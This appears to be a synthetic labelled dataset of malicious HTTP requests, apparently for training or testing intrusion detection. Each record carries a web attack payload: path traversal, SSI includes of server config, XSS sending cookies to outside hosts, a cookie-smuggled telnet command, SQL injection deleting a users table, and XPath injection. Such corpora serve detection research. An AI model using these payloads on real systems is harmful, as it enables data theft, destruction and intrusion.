Transfer-Encoding: gzip
Upgrade: ie8dt4/3.8, nnn/9.0
Warning: 471 27.216.46.14 "niesmisy" 
X-Forwarded-For: 187.158.7.224
X-Serial-Number: 263280
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38865
Start - Id: 45530
class: PathTransversal
GET /TX20d3-oadminN/oqq25yD.jpeg?eMebeI=Gy%3En&MYUCservicestp.I@4@=0631&t5aasd=lfed&6te=+d&altst=..%2F..%2F..%2FWINNT%2Fautoexec.bat&Lwindow.opendocumentA5tnsQNh=waiv1I&MZtv342rmvg=anpaOeihcr&0aed=s&mzt7=hAe&klclae3s=2570&icdmuate1=regh&neInetarnai=benPsxynl&tEtimH=417&aioereNsheied=dretRintmsscripta0 HTTP/1.0
Host: 208.67.59.247:80
Connection: keep-alive
Accept: */*
Accept-Charset: macintosh
Accept-Encoding: *
Accept-Language: r-tTho, 1eqsj-8udtsh0f;q=0.6
Cache-Control: no-transform
Client-ip: 228.114.110.173
Cookie: aeutest=omVT2;zsll=ilfBe;as8GaOulntashe=IB uc
Cookie2: $Version="02"
Date: Mon, 11 Oct 04 06:09:19 CET
ETag: "av.vRdQd-D-3_g1eS-h"
Expect: ax8lncn
From: aFhd@iesknmut3c.net
If-Modified-Since: Thu, 07 Jun 07 02:32:40 UTC
If-Unmodified-Since: Sat, 22 Jan 05 05:09:12 GMT
If-Match: "QO7mUYF7KF7JrlwdRBK"
If-None-Match: *
If-Range: "o-RPy4fdvX7UrgA3X"
Max-Forwards: 30
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest algorithm=i7re
Range: 903-3,3-4324,-8
Referer: http://www.wwara.ch/rdbM1sg4.tiff
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: tsaus8ibe (aeal42xRl; esWWvQvLK; ky7H.705; wQjeqPV; 4u7UmG.)
UA-CPU: 68000
UA-Disp: 3482,2872,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 441x867
Via: 6.5 www.tsIl.jpeg, HTTP/7.7 14.128.46.32, 1.6 227.195.95.56
Transfer-Encoding: compress
Upgrade: vleih/1.8, zzq/8.8, etwstn/4.5, eseo/9.8, ilezr/6.6
Warning: 291 197.115.20.32 "ofotvtereustbtDpofo" 
X-Forwarded-For: 55.26.191.205
X-Serial-Number: 2215888867609
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45530
Start - Id: 39753
class: SSI
GET /eKLNvps5f/5yeomms/6W@il-S_LCz/8gactMoeUsfjtfhplelo/sIXfg5wcq04saAmAKnf3/a9yB@j2XMSOu/t5Ed2CNlogZL5bZo/iGu3eGgkati3lNLdA/tQkQmGtMvt0RG./ix/o6c2.php4?slioera=6335372&h2a=345715519&bempes269hya=%3C%21--+%23include++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+--%3E&tealrlTbx0=oo4yHnTef2mnengr&qsTaeppToa0=NA%3D5acUruah+d&monwfaeNeee1=eSaEJ5D4C&tthltenr1=x%242 HTTP/1.0
Host: 155.21.174.118
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: p-k;q=0.5, o-eotfk;q=0.1, R0holR7-dtr6;q=0.2, 9eftr-r
Cache-Control: max-age=188
Client-ip: 230.191.177.45
Cookie: nUysWtelnet4Kall=2(1o
Cookie2: $Version="098"
Date: Tue, 19 Jul 05 02:25:19 CET
ETag: W/"T6v1gOR1o6OyhoM"
Expect: 7atT=ybaN
From: ls8tIstr@r3edte.de
If-Modified-Since: Wed, 10 Sep 08 20:36:41 GMT
If-Unmodified-Since: Fri, 31 Dec 04 10:08:36 CET
If-Match: "hdKwoB-gsr5C2jZDq"
If-None-Match: "Sxgz__kQ-nNDn4X6yIs"
If-Range: *
Max-Forwards: 9
MIME-Version: 3.3
Pragma: cOrai=iXLpec
Proxy-Authorization: Digest algorithm=rOwsg8ds
Authorization: lO6Soh rrse=ltmytu8
Range: 85-,34121-
Referer: /caxt/sohr.tiff
TE: trailers,trailers,gzip;q=0.9
Trailer: Date
User-Agent: iseeqmg
UA-CPU: 68000
UA-Disp: 377,8023,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5615x413
Via: 6.4 224.169.35.54
Transfer-Encoding: identity
Upgrade: oatd/4.4, hhpsas/3.0, oeinie/9.5, ne0e/6.0, osa/1.9
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 141.175.190.115
X-Serial-Number: 37299896
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39753
Start - Id: 42954
class: OsCommanding
GET /NpasswdsG.hxRJD/oat/rT/eMU7cq.6/bie/baeNrtth3/OvxIzCtelnet/r5pdo1/Kv@04betweenqZJiframeHLaccept.sh?rptdenorb=e8hs&xeeotmzqstl=stmn%40hugcmaiaibin&0Kolddnlhtezfnr=+l%7Es+ent3io&ga3naka=cmt0nuratrhA&aen4ebo8shma=4&r9sisnobsaiij=30&Cphi=aHTkZqsf&5sra=rE&tangnnpdszomrT=5Ilb0EhE4g&erdiesTsewr4=Hs&ojsAodregeAott=argiz587petrshbcoi&mBnevalbsmetaautoexec=et HTTP/1.1
Host: 229.27.173.90
Connection: geedde
Accept: video/quicktime;q=0.2, image/jpeg, application/rtf;q=0.6
Accept-Charset: x-mac-greek;q=0.7, x-mac-chinesesimp, x-mac-korean;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Cookie: xZg_=t;oein3LIGAbuToY=\"\; \/usr\/bin\/telnet www.ansioneltint.com    53875  ;
Cookie2: $Version="527"
Date: Wed, 15 Jun 05 04:48:38 GMT
ETag: W/"dfwVmnfK9h2fhEn1wTy"
Expect: ohdoc=nneryyAn;gSce
If-Modified-Since: Fri, 30 Oct 09 04:08:59 CET
If-Unmodified-Since: Thu, 23 Feb 06 03:51:36 GMT
If-Match: "W5feT-C89H4_lcJyZ-g"
If-Range: "l46EaoIO95N7c85V"
Max-Forwards: 3
Pragma: pthRn='7sae'
Proxy-Authorization: Basic M251amFvaDp6anRu
Authorization: Basic c2l0dHQ6bzlzcg==
Range: -715520,-4
Referer: /jnNyev.aspx
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: oepiorStsi1f1
UA-Color: color32
Via: 1.4 www.nsskoltn.gif
Transfer-Encoding: compress
Upgrade: ra4F/2.5, nr6r/2.4, ltj/8.1, osrll/1.3
Warning: 188 206.78.250.6 "rfstcWcoouvsl" "Mon, 24 Jan 05 04:09:16 UTC"
X-Forwarded-For: 9.108.251.79
X-Serial-Number: 61844777851149427
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42954
Start - Id: 40579
class: SSI
GET /8NBK/R5astdinvOW-aR.ebgsoundO/ndoiri7eEvirYeoeer/i6xxsNwe6Oohsecu6E/t0y85n/9AY0eexecP/nlaetu6sztc/CBI1on1.php4?auhsen=ietsgT&npdokiueTtEc8i=oea&ttaKrLetacpit5l=inp3SrgSF&weefreSsigeao=mretoleI3ER&eeist0u=trniciframe8eo&ADmail-13Yh7=rrtnhsaNqn&Sis=eg&tttkaRvt=E2&JKMLOEJLR@H=92646638&esbttbd=%3C%21--++%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++++--%3E&Iamkz=9561798&aeGelo4feed2rsr=3 HTTP/1.1
Host: 155.118.233.15
Connection: close
Accept: video/*, video/quicktime, text/xml
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Ct-iuwrCr2e;q=0.3, Tegfea-sas;q=0.9
Cache-Control: ilmn='tbv'
Client-ip: 18.199.244.27
Cookie: daAsdosh=o8QE97;smarrtzscc4rH=118570;chaoat5Xmqsd=2885145
Cookie2: $Version="2"
Date: Fri, 02 May 08 08:13:11 GMT
ETag: W/"zTQC3.87LXl7-H06oh"
Expect: 100-continue
From: ciHn@mdreeh.gov
If-Modified-Since: Sun, 24 Jul 05 03:26:50 GMT
If-Unmodified-Since: Sat, 25 Apr 09 11:55:01 GMT
If-Match: *
If-None-Match: "9L.p7udFEVJES7DIDNK8"
If-Range: *
Max-Forwards: 743
MIME-Version: 9.1
Pragma: tE=ter
Proxy-Authorization: iseoyl snmerayt=A2dhraa
Authorization: ooodnI beRzptke=q0stefCj
Range: -624002
Referer: http://9ojdeeId.biz/lTaverlR/1jfqrn/ieeectr/eAte.wmn
TE: deflate;q=0.8
Trailer: Date
User-Agent: Mozilla/5.6 (Windows; U; Win 9x 6.3; 4c-61; rv:6.0.1) Gecko/43678621
UA-CPU: PowerPC
UA-Disp: 563,477,16
UA-OS: Windows 98
UA-Pixels: 8517x087
Via: HTTP/1.6 118.151.109.145, 6.7 www.d0ta.png:0736, FTP/1.4 www.uzou.png
Transfer-Encoding: compress
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 835 www.trhpd.htm "psE9Ldemvcians32" "Sun, 26 Nov 06 20:41:29 UTC"
X-Forwarded-For: 35.78.67.33
X-Serial-Number: 69115
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40579
Start - Id: 47669
class: XSS
GET /ha5bh4e9hIruUiel/na/o7metaTW9yW8oUZ/opI0v/r.Sd/feR/gTyL/9DOvs92E6JqVQ76B513N/nizoeLf.mspx?GNservicesuL=%3Ciframe+++src++++%3D++++%22+++++vbscript%3A%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.iseset.com%2Fcgi-bin%2Fsi.cgi%27%2Bdocument.cookie%29%3B%5D++++%22%3E HTTP/1.0
Host: 80.13.72.86
Connection: seSahra
Accept: text/*;q=0.0, text/xml
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.0, gzip;q=0.6
Accept-Language: *;q=0.3
Cache-Control: muo=eeL
Client-ip: 39.154.184.38
Cookie: obf=tlRwatt1ag;ziteA=1196;Ia=59565;xcrt9v=cy;eg9cc=35792
Cookie2: $Version="8"
Date: Mon, 26 Jun 06 09:26:34 UTC
ETag: W/"z_T1tK75-Wf.Z._"
Expect: 6dleoav=hnlO
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Mon, 08 Nov 04 01:34:36 CET
If-Unmodified-Since: Sat, 27 Oct 07 10:45:48 GMT
If-Match: "i4QRCYzzyN2UmI5luK8"
If-None-Match: *
If-Range: "l_ORPJKEZn2GZH8S"
Max-Forwards: 2291
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic YzZrbmRnOmJlczQ=
Range: -017,-1,-32
Referer: http://oneyy.biz/iiylXyst/olrhtlem/ahsos/iwsazbe.nsf
TE: trailers,chunked
Trailer: From
User-Agent: Mozilla/3.1 (Machintosh; U; PPC Mac OS X 5.5; ra-hc; rv:5.5.8) Gecko/37949922
UA-CPU: 68000
UA-Disp: 2630,1668,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 934x7117
Via: zoes/3.0 235.135.82.75
Transfer-Encoding: compress
Upgrade: OceeiE/8.8, btin/1.3, wrUw/4.8, toehd/0.2, t0m4l/5.1
Warning: 036 www.sm7aE.jpeg "OA9la" "Thu, 19 Nov 09 13:07:50 GMT"
X-Forwarded-For: 118.255.6.210
X-Serial-Number: 6943669939
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47669
Start - Id: 35551
class: XPathInjection
PUT /pxslsbsiesne6Iteef/1Z4Pi-O3YJ.dll? HTTP/1.0
Content-Length: 133
Content-Language: CWemD,Nh
Content-Encoding: gzip
Content-Location: /j4EIt/bser/avc8DnOa/2yhauo.pl
Content-MD5: b2lkY29ubnVpc3VmdjhodQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Jul 05 20:59:35 GMT
Last-Modified: Mon, 13 Sep 04 12:42:21 GMT
Host: 189.232.240.41:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: ii-s9an
Cache-Control: no-cache
Client-ip: 89.252.62.136
Cookie: 6a0h6eaUtnraei=1168427;lsock_streamYncxvarN=r2
Cookie2: $Version="705"
Date: Sun, 22 May 05 23:59:22 GMT
ETag: "-FwfO-oPyhjIc7MMKhL"
Expect: 100-continue
From: r6prr@rraoosa.cz
If-Modified-Since: Sun, 06 Jul 08 20:29:05 GMT
If-Unmodified-Since: Fri, 02 Dec 05 23:20:52 UTC
If-Match: *
If-None-Match: "sMuaH3d4ST58x.S"
If-Range: "P1Lm2sc8jzbbKrH_S"
Max-Forwards: 14
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: len2te ytHaNuew=yalote
Authorization: NTLM eXNzc0FmbXNvZG41UzVlaHN0M25lbHhsdGtyNzFkdHJpcHM0
Range: 6-856001,00687-28
Referer: http://tysrvnrl.net/ilniev.php
TE: gzip;q=0.6
Trailer: If-Match
User-Agent: Mozilla/9.7 (Machintosh; U; PPC 9.5; hT-tO; rv:5.6.9) Gecko/11995989
UA-CPU: 68000
UA-Disp: 0509,6144,16
UA-Pixels: 5895x804
Via: 3.2 57.24.69.189, 2.2 179.239.59.119, FTP/0.6 www.fe2anub.gif
Transfer-Encoding: gzip
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 559 www.obo9.js "F7ceoat8n5sa5ne" "Wed, 18 Nov 09 09:39:58 UTC"
X-Forwarded-For: 20.224.84.217
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9hyV=8 or   1< S/vh0eEn/co/child::text()[position()=7]     or  437='] | /* | /foo[bar='

End - Id: 35551
Start - Id: 46835
class: XSS
PUT /0o3WKo.7D7HQAnyiM/e_vYPCQDb@X/nhvfucEKDlBa/neC7sKHB6Loc1/inSfTUW/kautoexecndivg/hGkyQXBJwsp1f2S6XiH/t9ccnuWdeveIoshoyl/8DPzReY/Ott9rewrasuO/tQ/ljiemeebtlraooa9fn.tiff? HTTP/1.1
Content-Length: 216
Content-Language: wqlSg,h
Content-Encoding: deflate
Content-Location: http://www.boinme.uk/he0nos/eckooa8/nafsa/ai0Lt/tl0yora.msf
Content-MD5: bmhhYXRjdGh0ZWUyaERhZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Mar 06 16:34:17 CET
Last-Modified: Wed, 14 Sep 05 11:14:56 GMT
Host: 199.253.49.59
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic;q=0.2, iso-8859-8-i;q=0.3, cp-950, windows-1258
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=9
Client-ip: 169.136.109.14
Cookie: csrtl5r=n7jchildh;dgtfeecvaiid=81677145
Cookie2: $Version="28"
Date: Tue, 23 Nov 04 19:38:42 UTC
ETag: "4y65XizpsvxblzyDhxg"
Expect: 100-continue
From: fassgdh4@tikal0.com
If-Modified-Since: Sun, 20 Apr 08 02:39:38 UTC
If-Unmodified-Since: Mon, 05 May 08 20:40:51 GMT
If-Match: "8GA@JKhk@20w68W-nV"
If-None-Match: *
If-Range: *
Max-Forwards: 3696
MIME-Version: 5.0
Pragma: ci=o7xr
Proxy-Authorization: NTLM Y2xlb0RhYWloY2Vsbm50dG5oZW94ZWV0MHNveWllTW84bm5pajhmcjdyb3Q5
Authorization: Basic ZGdyZ3ZmcTpzZ2x0bQ==
Range: 04-141477,-19
Referer: http://mosaOez.com/aate06Hd/lnrat/Hrlo/rioeaaaa/iooIg.gif
TE: trailers,gzip;q=0.9
Trailer: If-None-Match
User-Agent: Mozilla/4.8 (Machintosh; U; PPC Mac OS X 4.3; ro-hs; rv:4.9.6) Gecko/25245991
UA-CPU: Sparc
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: 6.3 251.194.107.11
Transfer-Encoding: compress
Upgrade: ccSen/7.1
Warning: 515 www.wruorr.jpg "seuttb" 
X-Forwarded-For: 92.3.241.226
X-Serial-Number: 072274181665
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Pe95=&{[document.location.replace ('http://www.arvetrng.com/cgi-bin/nt.cgi'+document.cookie);]};&rt=THhard7tadminxrv3ec&dNDlnGaaclfD=mme&rxoneesmhq=116&zQ7f@perlUGAv=naccess_logumBnT

End - Id: 46835
Start - Id: 45104
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.1
Host: 135.29.151.18
Connection: close
Accept: application/*
Accept-Charset: euc-cn, euc-kr, cp-936, x-mac-turkish;q=0.9
Accept-Encoding: 
Accept-Language: e9faxh-nna5;q=0.8
Cache-Control: only-if-cached
Client-ip: 154.211.218.131
Cookie: sedtph=3
Cookie2: $Version="1"
Date: Wed, 16 Apr 08 21:06:25 CET
ETag: W/"Fj-adqaO5kI8kAMZh.@"
Expect: cles=tnrrwes
From: hlsgr2q@lokeQ.ch
If-Modified-Since: Sun, 22 Nov 09 11:00:16 UTC
If-Unmodified-Since: Sat, 21 May 05 16:37:33 UTC
If-Match: "@qTsqfeb1mDFCco"
If-None-Match: "ksuzbOWJ_SPZ-KF"
If-Range: Wed, 16 Jun 04 07:09:52 GMT
Max-Forwards: 42
MIME-Version: 4.2
Pragma: se5d='nnfSaPsE'
Proxy-Authorization: NTLM TmhTZWRhdGhvaW9vZWlvc1dzenRmc2hhZDB1ZG5zcmFYZGQyc3Juc25uOA==
Authorization: NTLM b2pNMDZlYWZvbjFqaXN1ZW1kZXJ3bmVSeWRyaWFhbWF0eGJpdHk=
Range: -3,456-488022
Referer: /issh/sotfiD/6kleavt/deq25.js
TE: gzip;q=0.6,trailers
Trailer: Max-Forwards
User-Agent: xnldtee4e (raGR2NL)
UA-CPU: StrongARM
UA-Disp: 4629,539,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 213x015
Via: 2.0 91.186.196.32
Transfer-Encoding: iwry; op3ttF=ri0ttEhh
Upgrade: ud4hrt/2.8, ifephn/3.0, adtIIr/9.5, oHsuT3/8.9
Warning: 131 165.136.34.196 "tchbajdsaa" "Fri, 12 Mar 10 18:52:44 CET"
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 888948293
----: -----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45104
Start - Id: 47210
class: XSS
GET /oloyuatnmyeheatOme/l6IK/r1Mg6PXGhL_mv4We3/nLQlbtu@BTpnM/ieJE_Kk/sy1XTU-J6KP/widltDiOaaateS.html?UVVUznU1Ikq2=yvnstoR8IU&Eoft15teie=+cTEhnruzdf%3Da3execboot.ini&zc=yexeis0Osbl&1yepdqFd0a=2&hleoio=%26%3Cscript+++%3E%5Balert++%28%27enr%27%29%3B%5D%3C%2Fscript%3E&edooi=TrloesjLtlit&B.NY_vbscriptPtmpm1=ot&vneaTn=riliaaqez&ol0semshlPju6e=+Sndrb&xudesofidtt=32240&nrgdzpO2=073 HTTP/1.0
Host: 60.103.87.146:80
Connection: close
Accept: application/*, text/*;q=0.0, audio/*;q=0.5
Accept-Charset: koi8, iso-8859-5, x-mac-greek;q=0.4, windows-1253;q=0.1, windows-1250
Accept-Encoding: 
Accept-Language: dcoATvde-sl1n
Cache-Control: bteide='teue'
Client-ip: 63.161.16.102
Cookie: ZLgtelnet_=594649;era=fNd-X;uoes8his0ui4a=ecolaHmU;UJVB6GXL= aeahv
Cookie2: $Version="8"
Date: Sat, 08 Oct 05 11:45:37 UTC
ETag: W/"qBRk224-oxKp_anYp4X"
Expect: 100-continue
From: srhus@cga6s.uk
If-Modified-Since: Sat, 01 May 04 06:36:00 UTC
If-Unmodified-Since: Sat, 26 Jan 08 08:25:07 GMT
If-Match: *
If-None-Match: "NPkGpvGSG.VtH@OYuzv"
If-Range: Fri, 09 Feb 07 19:02:57 GMT
Max-Forwards: 2
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: NTLM c242dHJOdDVzYThpUmVtZ253THJzd2Rpb25oeWdoTm5ybQ==
Range: 8-,46-,-554862
Referer: /esr99o9e.php
TE: gzip;q=0.7
Trailer: Cache-Control
User-Agent: aaof0aT8l (mzVfAg6eg; u4LeCp; e.o7oW0; yPOPMOJ)
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 286x017
Via: 2.6 www.4geu.htm, 1.3 214.63.9.22
Transfer-Encoding: compress
Upgrade: urd/1.0
Warning: 023 176.209.137.215 "wrgDroclerrobjmfp3o" "Thu, 19 Jun 08 19:41:05 GMT"
X-Forwarded-For: 42.248.51.9
X-Serial-Number: 04739435468972088
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47210
Start - Id: 48962
class: XPathInjection
GET /fo/wgq./ssco1/pA/eydleZe/n23/ypzzwwh6w2S/ueHQwi1W/usc_4/0ueOd9R/replacePLM3MLHBcddivscript.bin?pXimgBLG1r=zacsodo&setormbhOaaO=hCEnduxEc&ho=ePI&gtn0t7e=eE0b&bXvn=cpM%40CdeEg&co2okikaio0s=oyby%7Ed&uhr=UOars%27%5D++%7C++++P+++++%7C++%2F%2Fuser%5B+++++name%2Ftext%28++++%29%3D+%27oe2e&ihso6le1bohhvz8=arwe&iisiia=el%27di%27mncdeeesshutdownh3&mo=22937&mjhms=lte3isetntyuCu&ihsnDkgpPee9oo=sqGM&Cxp_OYsx=e%26&echotE9Q=eFco6h&lh=enEehenSiyb HTTP/1.1
Host: 122.91.122.199
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, identity
Accept-Language: *
Cache-Control: max-stale
Client-ip: 170.112.198.15
Cookie: hoaDdMoywvjmt=52;rVWYiqa=y)b' rov8~e;
Cookie2: $Version="580"
Date: Mon, 26 Sep 05 24:47:24 GMT
ETag: "FUkp6cY6gug6IFvU"
Expect: 100-continue
From: aaee5oT@0lekntq.de
If-Modified-Since: Sun, 27 Jul 08 10:53:53 GMT
If-Unmodified-Since: Wed, 16 Jul 08 03:13:50 UTC
If-Match: "nzUQhucmVanG.qLfviNZ"
If-None-Match: *
If-Range: Sat, 20 Oct 07 01:37:11 UTC
Max-Forwards: 979
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: 7ryrer l7Fsei=9ums
Authorization: Basic aHNoYmNkOm5mZUllZWhl
Range: 5-
Referer: http://ontiiapE.fr/scaemvfh.pdf
TE: trailers,chunked;q=0.8,chunked;q=0.4
Trailer: Accept-Encoding
User-Agent: Mozilla/8.0 (Windows; U; Windows NT 3.2; oC-Ep; rv:0.8.4) Gecko/92993672
UA-CPU: 68000
UA-Disp: 7135,390,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7333x919
Via: HTTP/3.4 www.otitnae.jpeg, 9.5 www.hleheOth.tiff
Transfer-Encoding: deflate
Upgrade: 6cwot3/1.9
Warning: 932 www.wwas6l.css "3kbciaaakjefi5ciec" "Tue, 30 May 06 18:44:25 CET"
X-Forwarded-For: 58.153.30.65
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 48962
Start - Id: 42160
class: SqlInjection
GET /7qpositionH4ZqB.DPl/aghr3hAsipnN/eLstFc/AAOS/eeEEmleb8oXd/rqnwf9nv.msf?tetorktwx=%27+AND+++USER_NAME%28%29%3D%27ec9 HTTP/1.0
Host: www.lkct2ssz.biz
Connection: hpaDEan5
Accept: image/png;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: compress, deflate;q=0.6, deflate
Accept-Language: pwzni0ia-eqeu;q=0.0
Cache-Control: no-transform
Client-ip: 109.205.243.62
Cookie: suehwae7bmhtre=a+se ;nkohnfat=5;ssgfo=uscnvohl;ATgio=hhEz todaluniontmpinputc
Cookie2: $Version="18"
Date: Fri, 21 Jul 06 23:23:45 GMT
ETag: W/"q9@-@42oTbHORdulE04"
Expect: ivvi6tie
From: tktabU@4ahlq0ig.org
If-Modified-Since: Mon, 23 Mar 09 06:32:03 UTC
If-Unmodified-Since: Mon, 28 Aug 06 18:14:01 UTC
If-Match: *
If-None-Match: "DZGvhsVkDTpi1LLas5"
If-Range: Sun, 05 Jul 09 21:38:34 GMT
Max-Forwards: 63
MIME-Version: 5.8
Pragma: tyn1nq='pC3'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Basic QW5oYmlwcmw6TmkzM2x2
Range: 118-
Referer: http://www.axtaalj.be/noEgeo/ho9du/o74mse.php3
TE: deflate,trailers
Trailer: Expect
User-Agent: Mozilla/2.0 (Machintosh; U; Mac OS X 5.2; sG-hr; rv:6.5.2) Gecko/12080830
UA-CPU: StrongARM
UA-Disp: 234,2266,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3499x504
Via: 7.1 135.172.215.71
Transfer-Encoding: deflate
Upgrade: cosqd/4.3
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42160
Start - Id: 36495
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.0
Host: 137.27.38.175:29139
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: compress
Accept-Language: taamrIhn-akuijds;q=0.6, Feni4rdl-Uv0srt, Sdmei-en;q=0.3
Cache-Control: max-stale=7347
Client-ip: 219.137.139.146
Cookie: gei=diXE0Mhf0;ns3jot=sNMAay;es7j9arb6=147334;ttEzot=acdihn0im;eNncth=156
Cookie2: $Version="050"
Date: Wed, 09 Apr 08 15:02:09 GMT
ETag: W/"vjbM4Bxb6G26xH._"
Expect: atcEeo
From: oliee@2ucHyiTL.org
If-Modified-Since: Sun, 09 Aug 09 09:21:51 CET
If-Unmodified-Since: Thu, 21 Jan 10 17:11:10 UTC
If-Match: "lMqOAnisi3zsqiE"
If-None-Match: *
If-Range: "_z.zCFUN3Jq.GaGGwX6"
Max-Forwards: 904
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: iuqrt iwRdnnb=pgerxsn
Authorization: 0e1r d6darat=nrpk
Range: 998505-,-0540,815-
Referer: /tw9g/ecdbroeT/sasnqtn.cgi
TE: trailers
Trailer: If-Modified-Since
User-Agent: nDh0rsy6 (oXUbjk6D; ibb.ob0; a-uviDCtI; qADL1f7)
UA-CPU: MIPS
UA-Disp: 898,9805,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 512x1298
Via: 9.4 www.tadyh.html, 9.3 91.177.66.124, 3.2 187.152.126.45:9602
Transfer-Encoding: deflate
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36495
Start - Id: 42076
class: SqlInjection
GET /a1HFRJu06BX4o@dN/3b1FYY/fYZPJT/n_8B_SZ_HIktHhA.h/D0allrh.cmdG7.jpg?w2tundtlnnsn4=%27++%29%3B++++delete++from+++users%3B++++commit%3B++++dummy%28+++%27&qoachnodfaioe2e=t1hostmiC&egvIkVtco73sWN=9168007&bre1iceWantTct3=t_mSxbW9pJh&nntnaayliu7lh=o+4fi&Oattsmrds=415&Ltcs1=rmitc&dt0tnr2asenageE=Nol&iarn=tUsBb&nev2=77617&yrt=iyOesilldgtpHSe0&ZUsock_streamEy=87 HTTP/1.1
Host: www.euiwrhel.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ehoysntt-duc, eeil-niaereec;q=0.9
Cache-Control: only-if-cached
Client-ip: 79.156.167.12
Cookie: r0ssdklo=e window.openboot.inigroup by;eotd2rekltbc==a
Cookie2: $Version="059"
Date: Sat, 29 May 04 17:13:51 GMT
ETag: "SQ-tIM.HVaLNvisl3sL"
Expect: 100-continue
From: gan8eOt@rhvog.uk
If-Modified-Since: Mon, 12 Nov 07 21:44:55 CET
If-Unmodified-Since: Tue, 02 Oct 07 22:49:22 UTC
If-Match: *
If-None-Match: "09z3NyWNnJAYmcIw"
If-Range: "TJsrsfNJCZnFacpCa"
Max-Forwards: 225
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic ZXRhb2llOm9ZN2lJ
Authorization: Basic cnJpbDplcHJ0aGU=
Range: 54-40255,-926,-098
Referer: http://www.eraHielh.org/absamard.js
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.6 (Machintosh; U; PPC Mac OS X 0.3; le-ec; rv:5.2.5) Gecko/53608809
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4241x2926
Via: HTTP/8.0 179.46.94.57
Transfer-Encoding: compress
Upgrade: iaeh/2.5, tesmwr/4.5, wat/8.1, orsno/9.7
Warning: 537 38.107.5.37 "lwo1hwxdnein" 
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42076
Start - Id: 48156
class: XSS
